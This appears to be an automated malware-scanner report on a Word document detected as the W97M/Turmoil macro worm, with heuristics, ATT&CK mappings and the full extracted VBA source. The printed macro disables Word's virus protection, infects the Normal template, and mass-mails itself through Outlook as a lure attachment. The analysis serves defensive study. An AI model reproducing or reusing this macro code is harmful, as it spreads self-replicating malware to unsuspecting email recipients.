MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1105 Ingress Tool Transfer
The sample contains a VBA macro within a Document_Open subroutine, which is a common technique for malicious documents. This macro attempts to write a file to 'c:\turmoil.vxd' and potentially execute it, while also modifying registry keys related to international settings. The ClamAV signature 'Doc.Trojan.Turmol-1' strongly suggests the W97M/Turmoil family, known for its macro-based infection capabilities.
Heuristics 5
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 34,304 bytes but its declared streams total only 16,490 bytes — 17,814 bytes (52%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
ActiveDocument.SaveAs = "c:\turmoil.doc" Set outapp = CreateObject("outlook.application") Set mapi = a.GetNameSpace("MAPI") -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub document_open() On Error Resume Next
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2079 bytes |
SHA-256: 5f86bdb02b900dc2d09b946e85ed10898aee97fcdc1173835e36a88ff9d9fbb2 |
|||
|
Detection
ClamAV:
Doc.Trojan.Turmol-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_open()
On Error Resume Next
With Options
.VirusProtection = 0
.SaveNormalPrompt = 0
.ConfirmConversions = 0
End With
With Application
.EnableCancelKey = wdCancelDisabled
.ScreenUpdating = 0
.DisplayAlerts = wdAlertsNone
.DisplayStatusBar = 0
End With
Set norm = NormalTemplate.VBProject.VBComponents
Set adoc = ActiveDocument.VBProject.VBComponents
Const virii = "W97M/Turmoil"
Open "c:\turmoil.vxd" For Output As #1
Print #1, Application.VBE.ActiveVBProject.VBComponents.Item(1).codemodule.lines(1, Application.VBE.ActiveVBProject.VBComponents.Item(1).codemodule.CountOfLines)
Close #1
If norm.Item(1).codemodule.lines(72, 1) <> "'w97m/turmoil" Then
norm.Item(1).codemodule.AddFromFile ("c:\turmoil.vxd")
End If
If adoc.Item(1).codemodule.lines(72, 1) <> "w97m/turmoil" Then
adoc.Item(1).codemodule.AddFromFile ("c:\turmoil.vxd")
End If
turmoil = Int(Rnd(13) + 1)
If turmoil = 13 Then
System.PrivateProfileString("", "HKEY_USERS\.DEFAULT\CONTROL PANEL\INTERNATIONAL", "s1159") = "Turmoil"
System.PrivateProfileString("", "HKEY_USERS\.DEFAULT\CONTROL PANEL\INTERNATIONAL", "s2359") = "Turmoil"
End If
ActiveDocument.SaveAs = "c:\turmoil.doc"
Set outapp = CreateObject("outlook.application")
Set mapi = a.GetNameSpace("MAPI")
If outapp = "Outlook" Then
mapi.Logon "profile", "password"
For x = 1 To mapi.AddressLists.Count
Set y = mapi.AddressLists(y)
x = 1
Set tml = outapp.CreateItem(0)
For xx = 1 To d.AddressEntries.Count
e = y.AddressEntries(x)
tml.Recipients.Add e
x = x + 1
If x > 101 Then xx = y.AddressEntries.Count
Next xx
tml.Subject = "hello"
tml.Body = ".click to see the naked truth!"
tml.attachments.Add "c:\turmoil.doc", 1, 1, "truth.jpg"
tml.Send
e = ""
Next y
mapi.Logoff
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.